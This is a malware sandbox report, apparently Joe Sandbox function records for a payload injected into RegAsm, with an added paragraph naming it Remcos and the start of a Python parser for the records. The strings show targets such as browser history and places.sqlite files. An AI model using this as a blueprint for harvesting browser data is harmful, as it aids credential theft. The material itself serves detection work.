                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                • memset.MSVCRT ref: 00403A55
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                • String ID: history.dat$places.sqlite
                                                APIs
                                                  • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                • GetLastError.KERNEL32 ref: 00417627
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ErrorLast$File$PointerRead
                                                • String ID:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID: *.*$index.dat
                                                APIs
                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                • GetLastError.KERNEL32 ref: 004175A2
                                                • GetLastError.KERNEL32 ref: 004175A8
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ErrorLast$FilePointer
                                                • String ID:
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleTime
                                                • String ID:
                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                • String ID:
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CloseHandleSleep
                                                • String ID: }A
                                                APIs
                                                • malloc.MSVCRT ref: 00409A10
                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                • free.MSVCRT ref: 00409A31
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: freemallocmemcpy
                                                • String ID:
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID: BINARY
                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                • _mbscat.MSVCRT ref: 0040525B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                • String ID:
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID: /stext
                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$??2@CloseCreateHandleReadSize
                                                • String ID:
                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                • String ID:
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcmpmemset
                                                • String ID:
                                                APIs
                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                • CloseHandle.KERNEL32(?), ref: 00410654
                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                • String ID:
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                APIs
                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                • String ID:
                                                • API String ID: 2154303073-0
                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                APIs
                                                • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$PointerRead
                                                • String ID:
                                                • API String ID: 3154509469-0
                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                APIs
                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                • String ID:
                                                • API String ID: 4232544981-0
                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                APIs
                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileModuleName
                                                • String ID:
                                                • API String ID: 514040917-0
                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                APIs
                                                • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                APIs
                                                • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                APIs
                                                • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                APIs
                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                APIs
                                                • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                APIs
                                                • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: EnumNamesResource
                                                • String ID:
                                                • API String ID: 3334572018-0
                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                APIs
                                                • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CloseFind
                                                • String ID:
                                                • API String ID: 1863332320-0
                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                APIs
                                                • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
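The entries above are raw function records from the Joe Sandbox execution graph of the Remcos payload injected into RegAsm: each lists the Win32 and CRT imports one function calls (with the callee's own subcalls indented), the memory dump the code was lifted from, and the opcode/instruction fuzzy hashes used for similarity matching. Reading hundreds of these by hand is slow; the practical move is to parse them and pivot on the imports and on literal arguments, which is where the useful indicators sit (the Shell Folders registry key opened under HKLM, the *.* wildcard in the FindClose entry's argument list, the PrivateProfile INI settings calls). The parser below is an added example by the editor, not part of the report or of Joe Sandbox's tooling; the sample input is three entries copied from this section, and the behaviour tags are the editor's own triage heuristics.

```python
"""Parse Joe Sandbox function entries (the APIs / Memory Dump Source /
Similarity blocks of the execution graph) and tag each function by the
behaviour its imports suggest.  Added example, not Joe Sandbox code."""
import re

# Constructed sample input: three entries copied verbatim from the report above.
SAMPLE = r"""APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Memory Dump Source
• Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
APIs
• FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
Memory Dump Source
• Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseFind
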